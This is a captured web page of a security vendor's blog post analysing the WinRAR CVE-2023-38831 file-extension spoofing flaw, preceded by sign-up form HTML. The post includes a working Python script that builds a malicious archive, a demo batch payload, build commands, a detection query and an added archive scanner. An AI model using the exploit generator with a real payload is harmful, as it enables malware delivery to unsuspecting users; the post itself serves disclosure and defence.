www.uptycs.com
199.60.103.30
Public Scan
URL:
https://www.uptycs.com/blog/winrar-vulnerability-exploitation
Submission: On April 16 via api from BY — Scanned from DE
Form analysis
3 forms found in the DOM
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/a84fa16e-d67b-4c28-b1c2-bce43902236e
<form id="hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/a84fa16e-d67b-4c28-b1c2-bce43902236e"
class="hs-form-private hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e hs-form-a84fa16e-d67b-4c28-b1c2-bce43902236e hs-form-a84fa16e-d67b-4c28-b1c2-bce43902236e_6a163c41-1de7-4bcd-9125-7dbb5e2777e0 hs-form stacked hs-custom-form"
target="target_iframe_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" data-instance-id="6a163c41-1de7-4bcd-9125-7dbb5e2777e0" data-form-id="a84fa16e-d67b-4c28-b1c2-bce43902236e" data-portal-id="2617658"
data-test-id="hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" data-hs-cf-bound="true">
<fieldset class="form-columns-0">
<div class="hs-richtext hs-main-font-element">
<h1 style="font-size: 20px;">Sign up here:</h1>
</div>
</fieldset>
<fieldset class="form-columns-2">
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your First name"
for="firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>First name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Last name"
for="lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Last name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="lastname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Work Email" for="email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-2">
<div class="hs_phone hs-phone hs-fieldtype-phonenumber field hs-form-field" style="display: none;"><label id="label-phone-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Phone number"
for="phone-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Phone number</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="phone" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company hs-company hs-fieldtype-text field hs-form-field"><label id="label-company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Company name"
for="company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Company name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="company" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs-dependent-field">
<div class="hs_my_security_priority_is_ hs-my_security_priority_is_ hs-fieldtype-select field hs-form-field" style="display: none;"><label id="label-my_security_priority_is_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your My security priority is:" for="my_security_priority_is_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>My security priority is:</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="my_security_priority_is_" class="hs-input" type="hidden" value=""></div>
</div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_how_did_you_hear_about_uptycs_ hs-how_did_you_hear_about_uptycs_ hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-how_did_you_hear_about_uptycs_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your How did you hear about us?" for="how_did_you_hear_about_uptycs_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>How did you hear about us?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="how_did_you_hear_about_uptycs_" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_company_hq___state hs-company_hq___state hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-company_hq___state-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your Company HQ - State" for="company_hq___state-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Company HQ - State</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="company_hq___state" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_jobtitle hs-jobtitle hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-jobtitle-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Job title"
for="jobtitle-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Job title</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="jobtitle" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_numberofemployees hs-numberofemployees hs-fieldtype-number field hs-form-field" style="display: none;"><label id="label-numberofemployees-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Employees"
for="numberofemployees-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Employees</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="numberofemployees" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_became_an_mql_date hs-became_an_mql_date hs-fieldtype-date field hs-form-field" style="display: none;"><label id="label-became_an_mql_date-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your Became an MQL date" for="became_an_mql_date-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Became an MQL date</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="became_an_mql_date" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_ld_bookit_log_id hs-ld_bookit_log_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-ld_bookit_log_id-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your LD BookIt Log ID"
for="ld_bookit_log_id-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>LD BookIt Log ID</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="ld_bookit_log_id" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_source hs-utm_source hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_source-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_source"
for="utm_source-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_source</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_source" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_medium hs-utm_medium hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_medium-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_medium"
for="utm_medium-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_medium</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_medium" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_content hs-utm_content hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_content-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_content"
for="utm_content-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_content</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_content" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_campaign hs-utm_campaign hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_campaign-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_campaign"
for="utm_campaign-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_campaign</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_campaign" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="legal-consent-container">
<div class="hs-richtext">
<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href="https://www.uptycs.com/privacy" target="_blank">Privacy Policy</a></u>.</p>
</div>
</div>
</fieldset>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
</div><iframe
name="target_iframe_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" style="display: none;"></iframe>
</form>
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/0492e7b1-c029-4110-8042-598f482d9802
<form id="hsForm_0492e7b1-c029-4110-8042-598f482d9802_1944" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/0492e7b1-c029-4110-8042-598f482d9802"
class="hs-form-private hsForm_0492e7b1-c029-4110-8042-598f482d9802 hs-form-0492e7b1-c029-4110-8042-598f482d9802 hs-form-0492e7b1-c029-4110-8042-598f482d9802_1297ca44-21d4-42ea-8deb-d6564e7b5c32 hs-form stacked hs-custom-form"
target="target_iframe_0492e7b1-c029-4110-8042-598f482d9802_1944" data-instance-id="1297ca44-21d4-42ea-8deb-d6564e7b5c32" data-form-id="0492e7b1-c029-4110-8042-598f482d9802" data-portal-id="2617658"
data-test-id="hsForm_0492e7b1-c029-4110-8042-598f482d9802_1944" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-0492e7b1-c029-4110-8042-598f482d9802_1944" class="" placeholder="Enter your Work Email" for="email-0492e7b1-c029-4110-8042-598f482d9802_1944"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-0492e7b1-c029-4110-8042-598f482d9802_1944" name="email" required="" placeholder="email@work.com" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-0492e7b1-c029-4110-8042-598f482d9802_1944" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-0492e7b1-c029-4110-8042-598f482d9802_1944"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
</div><iframe
name="target_iframe_0492e7b1-c029-4110-8042-598f482d9802_1944" style="display: none;"></iframe>
</form>
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/464171ef-7766-4b86-9e48-f51bb13b325f
<form id="hsForm_464171ef-7766-4b86-9e48-f51bb13b325f_4495" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/464171ef-7766-4b86-9e48-f51bb13b325f"
class="hs-form-private hsForm_464171ef-7766-4b86-9e48-f51bb13b325f hs-form-464171ef-7766-4b86-9e48-f51bb13b325f hs-form-464171ef-7766-4b86-9e48-f51bb13b325f_3b848806-0722-4949-a72e-4881906c88f1 hs-form stacked hs-custom-form"
target="target_iframe_464171ef-7766-4b86-9e48-f51bb13b325f_4495" data-instance-id="3b848806-0722-4949-a72e-4881906c88f1" data-form-id="464171ef-7766-4b86-9e48-f51bb13b325f" data-portal-id="2617658"
data-test-id="hsForm_464171ef-7766-4b86-9e48-f51bb13b325f_4495" data-hs-cf-bound="true">
<div>
<div class="hs-richtext hs-main-font-element">
<h2 style="font-size: 20px; text-align: center; padding-bottom: 9px;">Connect with a security expert</h2>
</div>
</div>
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your First name"
for="firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>First name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Last name"
for="lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Last name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="lastname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
</div>
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Work Email" for="email-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_phone hs-phone hs-fieldtype-phonenumber field hs-form-field" style="display: none;"><label id="label-phone-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Phone number"
for="phone-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Phone number</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="phone" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company hs-company hs-fieldtype-text field hs-form-field"><label id="label-company-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Company name"
for="company-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Company name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="company-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="company" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
</div>
<div class="hs_how_did_you_hear_about_uptycs_ hs-how_did_you_hear_about_uptycs_ hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-how_did_you_hear_about_uptycs_-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your How did you hear about Uptycs?" for="how_did_you_hear_about_uptycs_-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>How did you hear about Uptycs?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="how_did_you_hear_about_uptycs_" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company_hq___state hs-company_hq___state hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-company_hq___state-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your Company HQ - State" for="company_hq___state-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Company HQ - State</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="company_hq___state" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_jobtitle hs-jobtitle hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-jobtitle-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Job title"
for="jobtitle-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Job title</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="jobtitle" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_numberofemployees hs-numberofemployees hs-fieldtype-number field hs-form-field" style="display: none;"><label id="label-numberofemployees-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Employees"
for="numberofemployees-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Employees</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="numberofemployees" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_became_an_mql_date hs-became_an_mql_date hs-fieldtype-date field hs-form-field" style="display: none;"><label id="label-became_an_mql_date-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your Became an MQL date" for="became_an_mql_date-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Became an MQL date</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="became_an_mql_date" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
</form>
Text Content
INSIDE THE WINRAR VULNERABILITY: DECODING & BOLSTERING PROTECTION

Tags: Threats
UPTYCS THREAT RESEARCH
September 08, 2023
Authors: Siddartha Malladi and Arpit Kataria

It’s been two weeks since researchers uncovered a high severity security flaw in the WinRAR utility that cyber adversaries are using to exploit the trusted ZIP archive format for malicious code execution. With active exploits currently underway, organizations are urged to update their software.

The sheer ubiquity of WinRAR in corporate settings makes this vulnerability an urgent concern. What sets this issue apart is its deceptive simplicity: an attacker can mask malicious scripts within a ZIP file, misleading both users and rudimentary security controls. Initial reports indicate that this technique has been weaponized against specialized online communities like those focused on cryptocurrency and stock trading.
Our deep-dive analysis offers not only a comprehensive understanding of the vulnerability but also practical steps for detection and mitigation. This is more than just another vulnerability explainer; consider it a comprehensive guide for cybersecurity professionals who need to understand the 'how' and 'why' behind CVE-2023-38831. Armed with this knowledge, you'll be better prepared to thwart attackers aiming to exploit this vulnerability in your organization.

UNDERSTANDING THE WINRAR VULNERABILITY

The recently unveiled WinRAR vulnerability, tracked as CVE-2023-38831, poses a unique challenge for cybersecurity professionals. This flaw disrupts WinRAR's handling of file extensions, opening doors for unauthorized code execution. What makes it particularly insidious is its ability to hide malicious executables within seemingly benign files, such as .PDFs or .JPGs, in an archive.

Recent evidence indicates that threat actors are capitalizing on this vulnerability to target cryptocurrency and stock trading communities, deploying malicious payloads like DarkMe, GuLoader, and Remcos RAT. These exploits have been on the rise from April to August 2023, magnifying the urgency for effective mitigation strategies among security teams.

CVE-2023-38831: TECHNICAL INSIGHTS

Cybercriminals are exploiting a security loophole in WinRAR that enables file extension spoofing. This deceptive technique enables them to embed malicious code in an archive disguised as a benign ".jpg", ".txt", or other commonly recognized file type. They package both benign and malicious files within a single ZIP archive. When victims open this malicious package, they see what seems like an image file and a folder with the same name as the image.

Figure 1 – Exploitation flow of CVE-2023-38831

Figure 2 – Malicious RAR file

This RAR contains an image.jpg file and an image.jpg folder. The image.jpg file is a decoy file and the image.jpg folder acts as the script carrier.
The folder houses a script set to execute upon the opening of the decoy file.

Figure 3 – Victim opening image.jpg file

In this demonstration, clicking on the image.jpg file not only opens a decoy image but also executes a script. This script triggers a dialog box that displays the message "Exploited CVE-2023-38831". Note that this is merely a demonstration. In a real-world scenario, a threat actor could design the script to display an image while clandestinely running a script to download malware in the background.

EXPLOITATION MECHANICS

Now let’s dive into the details of how the exploitation works:

* Within the ZIP archive, a file with the name "image.jpg" exists; however, a trailing space is intentionally added, making it "image.jpg ".
* Inside the ZIP archive, there's a folder "image.jpg " that has a file inside. This file contains malicious code, such as a script designed to download malware. This file has the same name as the deceptive file above, but with additional characters appended, like "image.jpg .cmd ". Importantly, the trailing space is intentionally included as part of the filename.
* When an application like WinRAR processes the ZIP archive, it encounters the deceptive "image.jpg " file and fails to properly handle the trailing space, leading to the vulnerability.
* Due to this improper handling, WinRAR executes unintended actions. It follows the instructions in the deceptive file ("image.jpg .cmd ") without recognizing it as malicious. These instructions make the computer run a program that it shouldn't.

Note: The exploit is only triggered if the victim both opens the RAR archive and accesses the image file specifically within WinRAR.

Once the victim clicks on the image.jpg file, WinRAR triggers the following command:

    cmd.exe /c C:\Users\<user>\AppData\Local\Temp\Rar$DIa6116.27667\image.jpg .cmd

Figure 4 – Inside image.jpg folder

To execute the previously outlined attack vector, we can utilize the following Python exploit script coupled with a batch payload script.
Exploit Script:

    import shutil
    import os
    import sys
    from os.path import join


    def generate_exploit(folder_name, decoy_filename, payload_filename, output_filename):
        decoy_ext = os.path.splitext(decoy_filename)[1].encode("utf-8")

        # Start from an empty working directory.
        if os.path.exists(folder_name):
            shutil.rmtree(folder_name)
        os.mkdir(folder_name)

        sub_dir = join(folder_name, decoy_filename + "1")
        if not os.path.exists(sub_dir):
            os.mkdir(sub_dir)

        shutil.copyfile(join(payload_filename), join(sub_dir, decoy_filename + "1.cmd"))
        shutil.copyfile(join(decoy_filename), join(folder_name, decoy_filename + "2"))

        shutil.make_archive(folder_name, 'zip', folder_name)

        # Replace the numeric suffixes with trailing spaces in the raw archive bytes.
        with open(folder_name + ".zip", "rb") as f:
            content = f.read()
            content = content.replace(decoy_ext + b"1", decoy_ext + b" ")
            content = content.replace(decoy_ext + b"2", decoy_ext + b" ")

        os.remove(folder_name + ".zip")

        with open(output_filename, "wb") as f:
            f.write(content)

        print("Exploit generated successfully:", output_filename)


    def main():
        if len(sys.argv) < 4:
            # Raw string so the backslash in the Windows path is not read as an escape.
            print(r"""Usage: python .\exploit.py <decoy_filename> <payload_filename> <output_filename>""")
        else:
            if len(sys.argv) != 4:
                print("Invalid number of parameters.")
            else:
                folder_name = "Malicious_file"
                decoy_filename = os.path.basename(sys.argv[1])
                payload_filename = os.path.basename(sys.argv[2])
                output_filename = os.path.basename(sys.argv[3])

                generate_exploit(folder_name, decoy_filename, payload_filename, output_filename)


    if __name__ == "__main__":
        main()

Payload script:

    echo x=msgbox(" Exploited the CVE-2023-38831 " ,0, "WinRAR") >> msgbox.vbs & start msgbox.vbs & image.jpg

Save the Python script as exploit.py and batch file as payload.bat. Additionally, place an image file renamed to image.jpg in the same folder. Now run the following command in order to generate a malicious RAR file:

    python .\exploit.py image.jpg payload.bat poc.rar

The Python script employs several tactics.
Firstly, it creates a directory named "Malicious_file," into which it places a duplicate of the image file, now renamed to "image.jpg1". It also generates a sub-directory, "image.jpg2" which houses a hidden payload named "image.jpg .cmd." The script then compresses these contents into a ZIP archive. In the final step, it subtly modifies the file names by replacing numerical suffixes with trailing spaces, exploiting the vulnerability.

DETECTION THROUGH UPTYCS XDR

Should your system have a vulnerable version of WinRAR, Uptycs XDR offers robust vulnerability scanning features for timely detection. Uptycs XDR stores vulnerability scan results in a dedicated table, accessible via SQL queries, as shown below:

    select cve_list, package_name, package_version, cvss_score, os
    from vulnerabilities
    where cve_list = 'CVE-2023-38831'

Figure 5 – Detection of CVE-2023-38831 using vulnerability scan

To remediate this issue, RARlab has issued WinRAR version 6.23; all preceding versions remain vulnerable.

Figure 6 – Detection of exploitation of the vulnerability

CONCLUSION

In summary, the CVE-2023-38831 vulnerability in WinRAR underscores the increasingly sophisticated tactics employed by cybercriminals. By exploiting file extension spoofing, they are able to embed malicious code within seemingly benign files. This serves as a cautionary tale for security teams, particularly those protecting environments where sensitive financial transactions occur, such as trading platforms. As threat actors evolve their techniques, it becomes increasingly imperative for cybersecurity professionals to maintain up-to-date software, implement robust security measures, and foster a culture of cybersecurity awareness within their organizations.
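
The archive layout described under EXPLOITATION MECHANICS (a file and a folder that share one name ending in a space, with a script inside the folder) can be flagged from the ZIP central directory alone, without extracting anything. The following Python check is an added example, not code from the original post or from Uptycs; the function names, the extension list and the sample entry names are assumptions constructed for illustration.

```python
import sys
import zipfile
from pathlib import PurePosixPath

# Extensions Windows treats as runnable (assumed list for this example).
RUNNABLE_EXTS = {".cmd", ".bat", ".exe", ".com", ".pif", ".scr",
                 ".vbs", ".js", ".ps1", ".lnk"}

# Constructed entry names mirroring the layout described in the article.
SAMPLE_SUSPICIOUS = ["image.jpg ", "image.jpg /", "image.jpg /image.jpg .cmd"]
# Constructed entry names for an ordinary archive.
SAMPLE_CLEAN = ["photos/", "photos/image.jpg", "readme.txt"]


def find_spoofed_entries(names):
    """Report file entries that share their exact name with a folder.

    `names` is the entry list of a ZIP central directory, as returned by
    zipfile.ZipFile.namelist(). A file system cannot hold a file and a
    folder with the same name side by side, so any such pair is anomalous;
    a trailing space in the shared name matches the CVE-2023-38831 layout.
    """
    normalized = [n.replace("\\", "/") for n in names]
    files = [n for n in normalized if not n.endswith("/")]
    findings = []
    for decoy in files:
        prefix = decoy + "/"
        if not any(n.startswith(prefix) for n in normalized):
            continue  # no folder carries this file's name
        nested = [n for n in files if n.startswith(prefix)]
        # Strip trailing whitespace before reading the extension, because
        # the nested name may itself end in a space ("image.jpg .cmd ").
        runnable = [n for n in nested
                    if PurePosixPath(n.rstrip()).suffix.lower() in RUNNABLE_EXTS]
        findings.append({
            "decoy": decoy,
            "trailing_space": decoy != decoy.rstrip(),
            "nested": nested,
            "runnable": runnable,
        })
    return findings


def scan_archive(path):
    """Read only the central directory; nothing is extracted or executed."""
    with zipfile.ZipFile(path) as archive:
        return find_spoofed_entries(archive.namelist())


if __name__ == "__main__":
    # Usage: python scan_zip.py <archive> [<archive> ...]
    for archive_path in sys.argv[1:]:
        for finding in scan_archive(archive_path):
            print(archive_path, finding)
```

A finding with both `trailing_space` set and a non-empty `runnable` list is the strongest match for the layout the article describes; a name collision without them is still worth a manual look.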